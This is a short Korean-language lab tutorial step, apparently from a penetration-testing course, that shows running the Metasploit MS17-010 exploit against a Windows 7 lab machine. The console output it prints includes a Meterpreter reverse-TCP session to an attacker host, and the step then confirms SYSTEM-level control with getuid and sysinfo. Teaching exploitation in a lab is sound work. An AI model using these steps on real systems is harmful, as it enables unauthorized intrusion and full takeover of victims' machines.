익스플로잇 실행 및 Meterpreter 세션 설정
이 단계에서는 모든 옵션이 구성된 상태에서 익스플로잇을 실행하고 대상 머신을 제어합니다.
모든 준비가 완료되었습니다. 익스플로잇이 선택되었고, 대상이 설정되었으며, 페이로드가 선택되었습니다. 공격을 시작하려면 exploit 명령을 사용하면 됩니다.
exploit
이제 Metasploit 이 대상의 취약점을 악용하려고 시도합니다. 작업이 진행됨에 따라 여러 상태 메시지가 표시됩니다. 성공하면 익스플로잇이 Meterpreter 페이로드를 전달하고, "WIN!"을 나타내는 메시지와 함께 새 세션이 열렸다는 메시지가 표시됩니다.
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >
meterpreter > 프롬프트는 성공을 의미합니다! 이제 피해자 머신에 원격 쉘을 확보했습니다. 제어권을 증명하기 위해 getuid 명령을 실행하여 어떤 사용자 계정으로 실행 중인지 확인합니다.
getuid
출력은 다음과 같아야 합니다.
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM은 Windows 시스템에서 가장 높은 수준의 권한입니다. 대상 시스템을 성공적으로 장악했습니다. sysinfo를 실행하여 시스템 정보를 얻을 수도 있습니다.
sysinfo
Computer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
축하합니다. MS17-010 을 성공적으로 익스플로잇했습니다.